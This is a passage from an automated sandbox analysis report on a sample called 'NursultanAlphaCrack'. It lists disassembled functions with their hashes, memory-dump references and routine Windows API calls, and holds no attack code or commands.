Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: afae2680f16551e5cc948b7723adc24a314e8835cce15f251f8a0091eaa9e24b
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 63022C71E006199BDF14CFA9D8906AEB7F1FF48314F25826AE919E7380D731AE41CB90

Function 001DAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 001DAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,001FE72C,?,?), ref: 001DAF84

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: f822c9726b5e5c7911c04bb973d3aba98ee6563972e8ff1c054445f2b3109d9b
Instruction ID: 795e8187ea8d8446b3c8381e50d28d191ab44efa60c27700e2105caaffb796eb
Opcode Fuzzy Hash: f822c9726b5e5c7911c04bb973d3aba98ee6563972e8ff1c054445f2b3109d9b
Instruction Fuzzy Hash: 8601713A100308AAD711DF64EC45FEA77FCEF18750F008422FA15D71A0D370A954CBA5

Function 001C6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(001C6DDF,00000000,00000400), ref: 001C6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 001C6C95

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 4c65fc60bbf9ab71cb7d3eb785b40553a06655b4edceff6dacba94e571147b88
Instruction ID: 561757b7e4d70e806cdd4687a6afce955f5243889aefa5164603982ed031975a
Opcode Fuzzy Hash: 4c65fc60bbf9ab71cb7d3eb785b40553a06655b4edceff6dacba94e571147b88
Instruction Fuzzy Hash: 3FD09271248300BAEA110A618D06F2AAB99AF55B51F18C409B6A9A84E1CA74D464E629

Function 001F19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,001F19EF,?,?,00000008,?,?,001F168F,00000000), ref: 001F1C21

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 38e7f059938fdc5ccbdd2c36f49c502752b2ee628b9e3d6b5a83035f44abfaf3
Instruction ID: b93c1e8eefed9a53cda1bee869a5bb691c5adaecd452ac527e52ee28ef0a6b0e
Opcode Fuzzy Hash: 38e7f059938fdc5ccbdd2c36f49c502752b2ee628b9e3d6b5a83035f44abfaf3
Instruction Fuzzy Hash: 00B13E35610609EFD719CF28C48AB657BF0FF45364F258658EA9ACF2A1C335D992CB40

Function 001DF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001DF66A

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 858ce3314541374e189044b8bbabe01eebf1447ec67cb4249e8caf10dffd0b03
Instruction ID: bff49c7b3d805b5ca41725193edb0bde42898adb1752b5676b0fb7c6f5354950
Opcode Fuzzy Hash: 858ce3314541374e189044b8bbabe01eebf1447ec67cb4249e8caf10dffd0b03
Instruction Fuzzy Hash: 19519171A00609DFDB28CF94E8857AAB7F5FB48314F24953ED412EB361D374AA42CB90

Function 001CB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 001CB16B

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: d49e2803a48c6860aa9d0896985287cc2d3b14af7c319b6b8ac1bc8f6f688081
Instruction ID: d8890001f4d779d0db3719e5132a2ccefafffbcf1004e47f06960f09abe278c7
Opcode Fuzzy Hash: d49e2803a48c6860aa9d0896985287cc2d3b14af7c319b6b8ac1bc8f6f688081
Instruction Fuzzy Hash: 91F017B4E002188FDB18CB18FC96AE973F2EB98315F544299E91593390C7B0A9C0CE64

Function 001C40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 001C41BC

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 48a822ee9ebde5bb9de3f67f887fa32817e556dec88a7b3e0fc538bdf66107fb
Instruction ID: ab292bde9641866a613dccac9fa3b1a70e23c5a097d9b6257b245a41178686ba
Opcode Fuzzy Hash: 48a822ee9ebde5bb9de3f67f887fa32817e556dec88a7b3e0fc538bdf66107fb
Instruction Fuzzy Hash: 76C12876A183418FC354CF29D88065AFBE1BFC8308F19892DE9A8D7311D734EA55CB96

Function 001DF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,001DF3A5), ref: 001DF9DA

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f05dc9acb286f5311ada88d5e86e79ad8baca31c196428336d624cad615b7cff
Instruction ID: 76b4c3ee26f8c140f72a005f25aa14982861cf252e512d966213ff366fe20d06
Opcode Fuzzy Hash: f05dc9acb286f5311ada88d5e86e79ad8baca31c196428336d624cad615b7cff
Instruction Fuzzy Hash:

Function 001EC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 001EC030

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 101e1e10aef87412849abe697a1d7b9ecb22b9b6ac764ff149822212acc062fd
Instruction ID: 2023f0bf3917c387802cf05bb3b8fb2964fb069efc2f311acbe3e0a5907f4557
Opcode Fuzzy Hash: 101e1e10aef87412849abe697a1d7b9ecb22b9b6ac764ff149822212acc062fd
Instruction Fuzzy Hash: 7DA01130202200EB83008F30AE0CA283AA8AA08280308002AA00AC0820EA2080A0AA00

Function 001D62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: a25f6053f36675c24f9167043e93b29425cb0526e13757ac2a842e04d31ccf36
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: EF62C6716047859FCB29CF28C4906B9BBE1BF95304F09896FE8EA8B346D734E945CB11

Function 001D77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 47b899e0e6349dd94b519cda88945e27016fa3f1f8317068fde76920f8082775
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: F662EB7160C7858FCB19DF28C8905B9BBE1BF95304F18896FE8968B386E730E945CB15

Function 001CF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: 91ad94f11d8acf534e92b43ba4b82aad68d9928888d2c37553996a1e76f11c77
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 0E524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 001D7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e12e5d79ec9d7e3e9a6d4d0aaf33709c27c40b19322af3968166a5e5e2f469
Instruction ID: 48dd4c0382f1231dbcea9868445b70319cd741100deb9be9da4234573eb1ef3d
Opcode Fuzzy Hash: c1e12e5d79ec9d7e3e9a6d4d0aaf33709c27c40b19322af3968166a5e5e2f469
Instruction Fuzzy Hash: FF12D1B16187469FC718CF28C890AB9B7E1FF94308F14892EE996C7781E334E995CB45

Function 001CC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7309ea93c3130323687d80e1f9afe12cb02e8bb7f32996e26613bd0c2a38dca
Instruction ID: ecbda6013bfd60b2c3de68c1d0b6111ea750da47ba6a54b3a773dc00c7306c1e
Opcode Fuzzy Hash: a7309ea93c3130323687d80e1f9afe12cb02e8bb7f32996e26613bd0c2a38dca
Instruction Fuzzy Hash: 3EF19971A083518FC718CF28C594A2ABBE5EFEA358F154A2EF489D7351D730ED458B82

Function 001D6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9c7887bf550f1439b66ce63a4b6ece2ba03c1229b40f9e6311294063707f61c7
Instruction ID: 1ab59ae24d1060469075ec79d724b5f6a18567484c4ee34e78478f3c961e4188
Opcode Fuzzy Hash: 9c7887bf550f1439b66ce63a4b6ece2ba03c1229b40f9e6311294063707f61c7
Instruction Fuzzy Hash: 27D1D6B16087448FDB14CF28C88475BBBE1BF99308F08456EF8899B382D774E909CB56

Function 001CE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b8ea3e71c14466ab805927a3577d58263d0c3bbff8cab986e760e11b357b310
Instruction ID: 92dd55178c6bd87df9c1f32049691a9a7af250979610f09f52190dd1bb4bb6d3
Opcode Fuzzy Hash: 4b8ea3e71c14466ab805927a3577d58263d0c3bbff8cab986e760e11b357b310
Instruction Fuzzy Hash: D7E146755083948FC304CF29E89486BBFF1AF9A310F49495EF9C497352C235EA19DBA2

Function 001D4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: 305cd25f4dec1cba44536f980f9acd774eff08966d6e2adb6560fdf07e2c6040
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: 139154B02003499BDB29EF68E895BBA77D5EFB0304F50092EF59687382DB74E545C352

Function 001D43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 1e0cfeaf7e3736c2ae307d49f0c0b538641dbb38fb8d627465e0c2f18bd52783
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 318148713043869BDB29DE68D8D1BBD37D4AFA1308F40092FE9868B382DB74D9858752

Function 001E51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172b1cbe9c098cf0b16ebd40baca7b0105933f34a671ce3ad19f38ebdfcf2b36
Instruction ID: 0a567482fddbe11ae3b722174761983ef673ae1af3161b9b2e92bff302353e5f
Opcode Fuzzy Hash: 172b1cbe9c098cf0b16ebd40baca7b0105933f34a671ce3ad19f38ebdfcf2b36
Instruction Fuzzy Hash: 46618735A00FCA97CB389A6B58917BE73A7FB1178CF14051AE643DF282D791DD428311

Function 001E4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: f17ac741a6dd43e05ffa4d6b66efe471d21c74366ff9cb9bc6e3ff6617f29866
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 73513571600FC857DF388A6F8556BBF67D79B52B0CF180919F882CB282C715EE4583A2

Function 001CEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
